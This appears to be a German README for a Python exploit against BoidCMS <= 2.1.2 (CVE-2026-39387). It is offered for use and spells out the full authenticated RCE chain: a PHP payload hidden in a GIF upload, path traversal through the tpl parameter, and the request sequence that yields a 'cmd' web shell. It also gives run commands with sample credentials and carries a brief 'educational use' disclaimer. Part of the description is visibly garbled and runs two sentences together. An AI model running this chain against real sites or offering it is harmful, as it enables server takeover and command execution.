
BoidCMS <= 2.1.2 RCE Exploit
BoidCMS <= 2.1.2 erlaubt es einem authentifizierten Angreifer, Remote Code Execution (RCE) zu erreichen, indem zwei Schwachstellen kombiniert werden:
image/gif), ohne den tatsächlichen Dateiinhalt zu validieren, sodass in einer GIF-Datei eingebetteter PHP-Code auf dem Server gespeichert werden kann.tpl-Parameter, der relativ zum Themes-Verzeichnis ohne Bereinigung aufgelöst wird, was Path Traversal (z.B. ../../media/shell.gif) ermöglicht, um das Template einer Seite auf die hochgeladene Datei zu verweisen.Wenn die präparierte Seite gerendert wird, führt der PHP-Interpreter die eingebettete Payload aus.
| Feld | Wert |
|---|---|
| Software | BoidCMS |
| Versionen | <= 2.1.2 |
| CVE | CVE-2026-39387 |
python3 CVE-2026-39387.py -u <target_url> -l <username> -p <password>
python3 CVE-2026-39387.py -u http://target.com -l admin -p password123
Sobald der Exploit abgeschlossen ist, wird eine interaktive Shell-Eingabeaufforderung (cmd >>) zur Befehlsausführung auf dem entfernten Host bereitgestellt.
1. Login → POST /admin (mit CSRF-Token)
2. Shell hochladen → POST /admin?page=media (shell.gif mit PHP-Payload)
3. Seite erstellen → POST /admin?page=create (tpl=../../media/shell.gif)
4. Shell ausführen → GET /<permalink>?cmd=<command>
pip install requests
Dieser Exploit wird nur zu Bildungszwecken und für autorisierte Sicherheitstests bereitgestellt. Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Genehmigung zum Testen haben, ist illegal und unethisch.
| Flag | Beschreibung | Beispiel |
|---|
-u, --url | Basis-URL der Ziel-BoidCMS-Website | http://target.com |
-l, --user | Admin-Benutzername | admin |
-p, --passwd | Admin-Passwort | password123 |